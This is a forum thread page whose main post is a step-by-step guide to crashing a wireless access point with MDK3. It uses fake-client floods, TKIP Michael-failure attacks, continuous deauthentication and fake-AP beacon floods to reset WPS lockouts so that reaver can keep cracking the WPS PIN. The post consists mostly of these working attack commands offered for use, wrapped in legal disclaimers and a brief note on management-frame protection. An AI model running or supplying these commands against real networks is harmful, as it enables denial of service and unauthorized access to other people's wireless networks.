Results 1 to 50 of 161

Thread: MDK3 Secret Destruction Mode

Threaded View

Previous Post Previous Post   Next Post Next Post
  1. #1
    Join Date
    United States

    How to Reset WPS Lockouts Using MDK3

    Use at your own risk! Section 638:17 of the New Hampshire House Bill 495 highlights United States rules against wireless hacking. Attempting to and or gaining access to a network that you do not own or have permission to is STRICTLY forbidden. I am NOT responsible for ANYTHING you do with this information.

    The purpose of this guide is to inform users about how a router can be exploited to temporarily reset WPS lockouts. This can be useful when using reaver to crack a WPS pin. Keep in mind that this does not work with every router. It largely depends on hardware. This attack uses MDK3, a set of tools by ASPj to overload the target AP with useless data, thus causing it to freeze and reset. Here is how it works. (Each of these commands are run in a separate terminal window) and I think you can figure out the variables here.

    mdk3 monX a -a xx:xx:xx:xx:xx:xx -m
    This floods the target AP with fake clients.

    mdk3 monX m -t xx:xx:xx:xx:xx:xx
    This causes Michael failure, stopping all wireless traffic. However, this only works if the target AP supports TKIP. (Can be AES+TKIP)

    mdk3 monX d -b blacklist -c X
    This keeps a continuous deauth on the network. If this attack does not start, make a blank text document in your root folder named blacklist. Leave it empty as MDK3 automatically populates the list.

    mdk3 monX b -t xx:xx:xx:xx:xx:xx -c X
    This floods a bunch of fake APs to any clients in range (only effective to windows clients and maybe some other devices, Macs are protected against this).

    You will know when the AP has reset either by checking with

    wash -i monX -C
    or if the target shows channel -1 and MB shows -1 in airodump.

    Please do NOT use this on a network that is not yours or that you do not have permission to. If the owner finds out that it is you who is attacking their network, you may end up in serious legal trouble.

    Visit ASPj's site as mentioned above for more information.

    Preventing the attack

    As of now, there is no way to prevent the attack except by disabling wireless, buying a high end router, or getting an AP that encrypts management packets. Deauthentication packets are management frames which are sent UNENCRYPTED unless you purchase an AP that supports MFP. You can read more about this here.

    Downloads for useful programs: I will do my best to keep these updated



    FrankenScript 2
    Last edited by soxrok2212; 2014-07-14 at 12:26.

Similar Threads

  1. MDK3 on 5Ghz
    By klawil in forum General Archive
    Replies: 3
    Last Post: 2017-05-24, 11:50
  2. MDK3 problem
    By wewe73 in forum TroubleShooting Archive
    Replies: 4
    Last Post: 2015-10-26, 14:14
  3. My Secret SSH user ...
    By prompt_32 in forum How-To Archive
    Replies: 2
    Last Post: 2014-01-14, 00:51

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts